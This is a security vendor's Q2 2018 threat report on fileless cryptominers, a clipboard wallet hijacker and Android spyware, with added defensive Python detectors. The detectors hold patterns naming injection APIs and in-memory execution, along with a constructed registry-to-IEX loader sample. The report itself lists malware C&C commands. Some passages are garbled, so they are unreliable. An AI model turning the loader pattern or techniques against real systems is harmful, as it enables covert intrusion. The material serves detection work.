Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.

BadShell at work
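The decoding step the analysts describe is mechanical: PowerShell's -EncodedCommand argument is base64 over the UTF-16LE bytes of the script, so a scheduled-task or process-creation log line can be decoded and inspected automatically. The Python below is an added example, not Comodo's tooling and not BadShell's own script: it decodes the argument, then scores the decoded text for the combination the report singles out, a registry read feeding in-memory execution. The sample command lines, the `HKCU:\Software\ExampleKey` path, and the indicator list are constructed for illustration.

```python
"""Decode -EncodedCommand PowerShell arguments and score them for the
BadShell pattern (registry-resident payload executed in memory).

Added example; command lines and indicators are constructed.
"""
import base64
import re

# Indicators an analyst would expect to see together in this attack pattern.
INDICATORS = {
    "registry_read": re.compile(r"Get-ItemProperty|HKCU:|HKLM:", re.I),
    "base64_payload": re.compile(r"FromBase64String", re.I),
    "in_memory_exec": re.compile(
        r"Invoke-Expression|\bIEX\b|\[Reflection\.Assembly\]::Load", re.I),
    "injection_api": re.compile(
        r"VirtualAlloc|CreateRemoteThread|WriteProcessMemory", re.I),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
}

# Matches -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -EncodedCommand, else None."""
    match = _ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def score_cmdline(cmdline):
    """Return the set of indicator names hit in the command line plus decoded script."""
    script = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + script if script else "")
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def is_badshell_like(cmdline):
    """True when a registry read is paired with in-memory execution or injection."""
    hits = score_cmdline(cmdline)
    return "registry_read" in hits and bool(hits & {"in_memory_exec", "injection_api"})


def encode_for_powershell(script):
    """Used only to build the constructed sample: base64(UTF-16LE(script))."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample shaped like the report's description (not BadShell's code):
# read a value from a hypothetical registry key, decode it, run it in memory.
SAMPLE_SCRIPT = ("$p=(Get-ItemProperty -Path HKCU:\\Software\\ExampleKey).Payload;"
                 "IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($p)))")
SAMPLE_MALICIOUS = "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(SAMPLE_SCRIPT)
SAMPLE_BENIGN = "powershell.exe -File C:\\Scripts\\backup.ps1"

if __name__ == "__main__":
    for line in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(sorted(score_cmdline(line)), is_badshell_like(line))
```

Scoring on the combination rather than on any single indicator keeps administrative scripts that merely read the registry from paging anyone; the pairing of a registry-held blob with IEX or a reflective load is what distinguishes the fileless miner from ordinary automation.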


The malicious code in the registry


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature – it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task – mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess," meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature will terminate its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner has undivided occupation of the victim's computer and uses its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2 these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users started checking websites' code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
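The camouflage works because a person reading page source sees only an encoded string; a scanner that decodes such strings and then looks for a 1x1 iframe pointing at a shortener sees through it. The following Python is an added example and not code from the report or from Comodo: it pulls base64 literals passed to atob()-style decoders, parses both the raw page and each decoded string for iframes, and reports frames that are 1x1 or that point at cnhv.co (the shortener host shown above). The sample HTML, the `/example-short-link` path, and the `MINER_HOSTS` set are constructed for illustration.

```python
"""Find Coinhive loaders hidden behind encoded strings and 1x1 iframes.

Added example; the page HTML and MINER_HOSTS entries are constructed.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SHORTENER_HOSTS = {"cnhv.co"}        # the shortener host shown in the report
MINER_HOSTS = {"coinhive.com"}       # assumption: direct miner host to flag as well

# A base64 literal handed to a client-side decoder, e.g. atob("...").
_B64_ARG = re.compile(
    r"(?:atob|FromBase64String)\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


class _IframeCollector(HTMLParser):
    """Collect (src, width, height) for every iframe start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            a = dict(attrs)
            self.iframes.append((a.get("src", ""), a.get("width"), a.get("height")))


def decode_embedded_strings(html):
    """Yield plaintext for each base64 literal found in decoder calls."""
    for match in _B64_ARG.finditer(html):
        try:
            yield base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue


def _tiny(dim):
    """True for a width/height attribute of 1px or less."""
    try:
        return dim is not None and int(dim.strip("px")) <= 1
    except ValueError:
        return False


def find_hidden_miner_frames(html):
    """Return findings for suspicious iframes in the page and in decoded strings."""
    findings = []
    layers = [("page", html)] + [("decoded", t) for t in decode_embedded_strings(html)]
    for where, text in layers:
        collector = _IframeCollector()
        collector.feed(text)
        for src, width, height in collector.iframes:
            host = (urlparse(src).hostname or "").lower()
            known = host in SHORTENER_HOSTS or host in MINER_HOSTS
            one_by_one = _tiny(width) and _tiny(height)
            if known or one_by_one:
                findings.append({"where": where, "src": src, "host": host,
                                 "one_by_one": one_by_one, "known_miner_host": known})
    return findings


# Constructed sample: a normal-looking page whose script writes a hidden frame.
HIDDEN_FRAME = '<iframe src="https://cnhv.co/example-short-link" width="1" height="1"></iframe>'
SAMPLE_HTML = ('<html><body><h1>Blog</h1><script>document.write(atob("'
               + base64.b64encode(HIDDEN_FRAME.encode()).decode("ascii")
               + '"))</script></body></html>')
CLEAN_HTML = ('<html><body><iframe src="https://video.example.invalid/embed" '
              'width="640" height="360"></iframe></body></html>')

if __name__ == "__main__":
    print(find_hidden_miner_frames(SAMPLE_HTML))
```

Running the scan in two layers (raw page, then decoded strings) is the point: the raw page produces nothing, exactly as the user in the scenario above found, and the decoded layer exposes the frame together with its telltale 1x1 dimensions.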

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember it or fill it in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a gap they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world
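The swap in the example above is detectable on the user's side because the address that lands in the payment form differs from the one that was copied, and because wallet addresses carry a checksum that a wallet or browser extension can verify before sending. The Python below is an added example, not code from the report or from any wallet: it classifies an address by its legacy prefix, verifies the 4-byte double-SHA256 base58check checksum, and raises an alarm when the pasted address is a valid-looking wallet address that is not the one copied. The two addresses are the ones the report shows; the copied/pasted pairing is a constructed scenario, and `make_test_address` exists only to build a known-good address for the demonstration.

```python
"""Detect a clipboard wallet-address swap and validate base58check addresses.

Added example; the copied/pasted scenario is constructed.
"""
import hashlib
import re

_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy Bitcoin address shape: prefix 1 (P2PKH) or 3 (P2SH), base58 body.
_BTC_SHAPE = re.compile(r"^[13][" + _ALPHABET + r"]{25,34}$")


def b58decode(s):
    """Base58 string -> bytes, preserving leading zero bytes encoded as '1'."""
    n = 0
    for ch in s:
        n = n * 58 + _ALPHABET.index(ch)  # ValueError on a non-base58 character
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + raw


def b58encode(b):
    """Bytes -> base58 string, encoding each leading zero byte as '1'."""
    n = int.from_bytes(b, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = _ALPHABET[rem] + out
    pad = len(b) - len(b.lstrip(b"\x00"))
    return "1" * pad + out


def base58check_valid(addr):
    """True if the last 4 bytes equal the double-SHA256 checksum of the payload."""
    try:
        data = b58decode(addr)
    except ValueError:
        return False
    if len(data) < 5:
        return False
    payload, checksum = data[:-4], data[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def make_test_address(version_byte, hash20):
    """Build a base58check address from a version byte and a 20-byte hash (demo only)."""
    payload = bytes([version_byte]) + hash20
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return b58encode(payload + checksum)


def address_kind(addr):
    """'p2sh', 'p2pkh', or None, judged by shape alone (checksum checked separately)."""
    if not _BTC_SHAPE.match(addr):
        return None
    return "p2sh" if addr[0] == "3" else "p2pkh"


def clipboard_swap_detected(copied, pasted):
    """True when both strings look like wallet addresses but are not the same one."""
    return (address_kind(copied) is not None
            and address_kind(pasted) is not None
            and copied != pasted)


# Addresses from the report's example: what the user copied vs. what was pasted.
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
PASTED = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"

if __name__ == "__main__":
    print(address_kind(COPIED), address_kind(PASTED), clipboard_swap_detected(COPIED, PASTED))
```

Note that the substituted address in the report is itself well-formed, so checksum validation alone does not catch the swap; only comparing what was copied against what was pasted does. The checksum still matters as a second line of defence, since a transfer to a mistyped or truncated address is unrecoverable for the same reason a transfer to the attacker's address is.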

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician, or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details, contacts (ID, name, phone numbers), and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type), and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps, and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls, and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1: Dardesh (Google Play Services Instant Apps)

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio, and video; uninstalls other apps; sends and receives messages; and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata, and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64, and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details, and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the installed applications
• Collect browser data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular, legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of the previous versions, it includes some additional tricks:

• Extracts photos, audio, and video
• Records the screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

• Takes control over the Bluetooth adapter
• Extracts data about accounts, contact details, and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader


After infection Xloader connects to its CampC server and executes the following commands

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo

Extract contacts details

Set Wi-Fi always turned on

Version 2 can execute additional commands

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access to a location specified by attackers

Make records

Make calls

415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service

Global Threat Report Q2 2018 Edition

Page 32 of 73

Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot. The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1 Adobe Flash Player

Version2 Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:


Send_SMS — extract SMS content and send it to the C&C server

Send_USSD — send the USSD to the C&C server

Gethistory — monitor browser history

Start_AllApp — gather info about installed applications

Send_call — set the Intent action to call

Forward_call — forward incoming calls

ResForward_call — reset call forwarding

Go_Smsmnd — delete SMS content

Go_GetAlls — get SMS history

Dell_sms — delete SMS content in a conversation

Send_spam — send spam SMS

Start_Inject — call the injectors class

4.1.7 FakeSpy. FakeSpy also has many masks, as you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information


4.1.8 RedAlert. RedAlert changes multiple "spy legends" to get users' trust. It wears masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber

Version_2 Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat. The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay. The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake "skip option" notification. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in a variety of disguises, named below.

4.1.11 CoinHive. And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1 Netflix Hack Instagram Hack

Version-2 TSF Launcher

Version-3 Android Service PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via … another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month. Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April (chart)

4.2.2 May 2018

Android-targeted malware in May (chart)


4.2.3 June 2018

Android-targeted malware in June (chart)


5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms. A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms. This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms. A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms. Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms. A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.


5.1.5 IM Worms. Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors. A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses. A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans. Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.


5.2.4 Exploits. Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
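The section above says that most Q2 exploit detections rode on PDF files but not what a defender looks for in one. The following triage script is an added example, not Comodo's code or part of the report: it flags PDFs whose catalog or objects carry action-capable names (/OpenAction, /JavaScript, /JS, /Launch and the like), resolves the #xx hex escapes that a PDF name may use to hide from a naive string search, and inflates FlateDecode streams so that an action tucked inside a compressed object is seen too. The indicator list is this example's own choice, and both sample documents are constructed inline.

```python
import re
import zlib

# Name objects that make a PDF act rather than merely render. Assumption of this
# example: this indicator set is a triage heuristic, not an exhaustive list.
RISKY_RE = re.compile(
    rb"/(JavaScript|JS|OpenAction|AA|Launch|EmbeddedFile|RichMedia|XFA)(?![A-Za-z0-9])")
# A PDF name may spell any byte as #xx (/J#61vaScript == /JavaScript); naive
# grep-style scanners miss that, so names are normalised before matching.
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
# stream ... endstream bodies; the lookbehind keeps 'endstream' from starting a match.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)


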